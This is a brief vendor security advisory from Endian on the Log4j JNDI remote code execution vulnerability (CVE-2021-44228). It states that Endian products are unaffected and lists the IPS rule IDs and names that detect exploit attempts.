NVD (National Vulnerability Database) Reference
Background
Log4j is a powerful Java based logging library maintained by the Apache Software Foundation.
In all Log4j versions >= 2.0-beta9 and <= 2.14.1 JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.
Endian Impact
No Endian products or services are directly impacted by this vulnerability.
Endian Detection & Protection Capabilities
The most current version of the Endian IPS ruleset (dated Dec. 12, 2021) contains the following rules that can be applied to provide protection against the vulnerability:
Rule SID
|
Rules Category
|
Rule Description
|
---|---|---|
2034661 | emerging-info | ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228) |
2034662 | emerging-info | ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228) |
2034663 | emerging-info | ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228) |
2034664 | emerging-info | ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228) |
2034665 | emerging-info | ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228) |
2034666 | emerging-info | ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228) |
2034670 | emerging-attack_response | ET ATTACK_RESPONSE DNS Query for Observed CVE-2121-44228 Payload Domain |
Conclusion
Endian will continue to monitor the situation and provide updates to this article to keep our customers as informed as possible.
Comments